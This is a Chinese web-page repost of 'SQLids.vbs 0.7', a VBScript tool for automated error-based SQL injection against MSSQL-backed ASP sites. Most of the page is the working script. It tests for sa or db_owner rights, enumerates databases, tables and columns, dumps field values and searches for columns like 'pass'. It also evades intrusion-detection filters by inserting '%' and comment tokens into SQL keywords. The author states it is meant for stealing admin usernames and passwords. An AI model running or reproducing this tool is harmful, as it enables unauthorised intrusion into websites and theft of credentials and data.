主页 > 知识库 > SQLids.vbs 0.7(最终版,以后改成gui界面的)

SQLids.vbs 0.7(最终版,以后改成gui界面的)

热门标签:新密防封卡外呼系统违法吗 百度地图标注怎么卸载 海外美发店地图标注 外呼营销下单系统 打电话的外呼系统贵不贵 办理胶州400电话财税 前锋办理400电话申请 加盟电销机器人好的品牌 陕西高频外呼回拨系统哪家好

是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。

set arg=wscript.arguments 

If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then 
Wscript.Quit 
End If 
if arg.count=0 then 
usage() 
Wscript.Quit 
End If 

Sub usage() 
wsh.echo string(79,"*") 
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有请用双引号包含url" 
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" 
wsh.echo "以下两个脚本可互相参考" 
wsh.echo "//www.jb51.net/article/14172.htm" 
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html" 
wsh.echo "Usage:" 
wsh.echo "cscript "wscript.scriptname" url limit ||----------->得到当前权限"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit" 
wsh.echo "cscript "wscript.scriptname" url dbname ||----------->得到全部库名"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname" 
wsh.echo "cscript "wscript.scriptname" url table 库名||-------->得到所给库的全部表名"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table 
master" 
wsh.echo "cscript "wscript.scriptname" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp? 
id=1 filed master spt_server_info" 
wsh.echo "cscript "wscript.scriptname" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp? 
id=1 result id master sysinfo" 
wsh.echo "cscript "wscript.scriptname" url search 你要查找的字段名||--->根据关键字查找字段"vbcrlf"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search 
pass" 
wsh.echo string(79,"*")vbcrlf 
end Sub 


Function getHTTPPage(Path) 
t = GetBody(Path) 
getHTTPPage = BytesToBstr(t, "GB2312") 
End Function 

Function UrlEncode(str) 
str = Replace(str," ","%20") 
UrlEncode = str 
End Function 

Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交 
On Error Resume Next 
Aurl=Split(url,"?") '这是为post提交的 
Set Retrieval = CreateObject("Microsoft.XMLHTTP") 
With Retrieval 
.Open "post", Aurl(0), False, "", "" 
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
.setRequestHeader "Accept-Encoding", "gzip, deflate" 
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 
3.0.04506; .NET CLR 1.1.4322)" 
.setRequestHeader "Connection", "Keep-Alive" 
.setRequestHeader "Cache-Control", "no-cache" 
.Send UrlEncode(Aurl(1)) 'post提交 
GetBody = .ResponseBody 
.abort 
End With 
Set Retrieval = Nothing 
End Function 


Function BytesToBstr(Body, Cset) 
Dim objstream 
Set objstream = CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode = 3 
objstream.Open 
objstream.Write Body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadTExt 
objstream.Close 
Set objstream = Nothing 
End Function 


Function ReplaceKeyWord(Value)'绕过ids过虑 
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% 
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- 
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| 
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] 
|sp_->s%p_|[k]|and->a%nd" 
Dim i, Relpacement, Temp 
Relpacement = Split(Table, "|[k]|") 
ReplaceKeyWord = Value 
For i = 0 to UBound(Relpacement) 
Temp = Split(Relpacement(i), "->") 
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1)) 
NExt 
End Function 


Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会 
aHTML = Split(sHTMLTEMP, "varchar") 
If(UBound(aHTML) > 0)Then 
sHTMLTEMP = aHTML(1) 
aHTML = Split(sHTMLTEMP, "'") 
sHTMLTEMP = aHTML(1) 
End If 
result=sHTMLTEMP 
End Function 

Function Str2HEx(strHEx)'sql的16进制转换函数 
Dim sHEx 
For i = 1 To Len(strHEx) 
sHEx = sHEx  HEx(Asc(Mid(strHEx,i,1)))"00" 
NExt 
Str2HEx = "0x"sHEx 
End Function 

Function Str2HExtwo(strHEx)'sql的16进制转换函数 
Dim sHEx 
For i = 1 To Len(strHEx) 
sHEx = sHEx  HEx(Asc(Mid(strHEx,i,1))) 
NExt 
Str2HExtwo = "0x"sHEx 
End Function 


Function MoveR(Rstr) '去重复 
Dim i,SpStr 
SpStr = Split(Rstr,",") 
For i = 0 To Ubound(Spstr) 
If I = 0 then 
MoveR = MoveR  SpStr(i)  "," 
Else 
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then 
MoveR = MoveR  SpStr(i) 
Elseif instr(MoveR,SpStr(i))=0 Then 
MoveR = MoveR  SpStr(i)  "," 
End If 
End If 
NExt 
End Function 


function page(sql) 
page=Replace(getHTTPPage(url" "ReplaceKeyWord(sql)),Chr(34),"") 
End Function 

url=arg(0) 

injection =arg(1) 


'--------------------------------------以下代码是注入语句,完全不需要引号 
select case arg(1) 

Case "limit" 
body=Replace(getHTTPPage(url),Chr(34),"") 
'语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner 
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" 
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" 
Bodyone=page(sqlone) 
bodytwo=page(sqltwo) 
wsh.echo "当前信息:" 
If Len(body)=Len(Bodyone) Then wsh.echo "SA" 

If Len(body)=Len(Bodytwo) And Len(body)>Len(Bodyone) Then 
wsh.echo "DB_owner" 
Else 
wsh.echo "PUBLIC" 
End If 

sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" 
rtemp=Split(sqlthtree,"|") 
servername=result(page(rtemp(0))) 
version=result(page(rtemp(1))) 
user=result(page(rtemp(2))) 
db_name=result(page(rtemp(3))) 
wsh.echo "servername:"servername 
wsh.echo "version:"version 
wsh.echo "user:" user 
wsh.echo "db_name:" db_name 

case "dbname" 
i=1 
Do 
sql="and db_name("i")>0--" '暴库名语句 
Body = page(sql) 
k=InstrRev(body,"varchar", -1, 0) 
i=i+1 
If k>0 Then 
wscript.echo result(body) 
Else 
wsh.echo "========over============" 
End if 
Loop Until k=0 

case "table" 
i=1 
Do 
' 表名语句 agr(2)表示库 
sql="and 0>(select top 1 name from "arg(2)".dbo.sysobjects where xtype=0x7500 and name not in (select top " i " name from "arg(2)".dbo.sysobjects 
where xtype=0x7500))--" 
Body = page(sql) 
k=InstrRev(body,"varchar", -1, 0) 
i=i+1 
If k>0 Then 
wscript.echo result(body) 
Else 
wsh.echo "========over============" 
End if 
Loop Until k=0 

case "filed" 
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["arg(2)"]..[sy%sob%je%cts] wh%ere name="Str2HEx(arg(3))")=0-- 
" 
biaoid=result(page(sqlbiaoid)) 
biaoid=Replace(biaoid,Chr(124),"") 
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["arg(2)"]..[sys%columns] wh%ere id="biaoid")=0-- " 
k=Replace(result(page(sqlclounmcnt)),Chr(94),"") 
wsh.echo "共有列名"k"个" 
For i=1 To k 
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "i" colid,name fr%om ["arg(2)"]..[sys%columns] wh%ere 
id="biaoid" order by colid) t order by colid desc)=0--" 
wsh.echo result(page(sqlfiled)) 
nExt 


case "result" 

i=1 
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["arg(3)"]..["arg(4)"] where 1=1)>0--" '暴列的总数目语句 
k=result(page(sqlcloum)) 
k=Replace(k,Chr(94),"") 
wsh.echo arg(2)"字段共有记录数"k"个"vbcrlf 
For i=1 To k 
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("arg(2)" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "i" ["arg(2)"] fr%om ["arg(3)"]..["arg(4) 
"] wh%ere 1=1 order by ["arg(2)"]) t wh%ere 1=1 order by ["arg(2)"] desc )=0--" 
Body = page(sqlneirong) 
wscript.echo Replace(result(body),Chr(94),"") 
Next 


Case "search" 
love=Str2HExtwo(arg(2)) 
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式" 
TimeSpend = Timer 
For i=1 To 10 '可以根据需要改动这个10 
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"i"/* */object_name(id)/* */as/* */t_name,name/* 
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("love"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/* 
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--" 
Body = page(sqlsearch) 
body=result(body) 
a=abody"," 
NExt 
TimeSpend = round(Timer - TimeSpend,2) 
wsh.echo MoveR(a) 
wsh.echo "用时:"  TimeSpend  "秒." 


Case Else 
If arg(1)>"limit" Or arg(1)>"dbname" Or arg(1)>"search" Or arg(1)>"table" Or arg(1)>"filed" Then 
wscript.echo "注意参数" 
usage() 
End if 
end select 

到此这篇关于SQLids.vbs 0.7(最终版,以后改成gui界面的)的文章就介绍到这了,更多相关SQLids内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

标签:河南 阜阳 咸阳 伊春 梅州 四平 武威 牡丹江

巨人网络通讯声明:本文标题《SQLids.vbs 0.7(最终版,以后改成gui界面的)》,本文关键词  SQLids.vbs,0.7,最终,版,以后,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《SQLids.vbs 0.7(最终版,以后改成gui界面的)》相关的同类信息!
  • 本页收集关于SQLids.vbs 0.7(最终版,以后改成gui界面的)的相关信息资讯供网民参考!
  • 推荐文章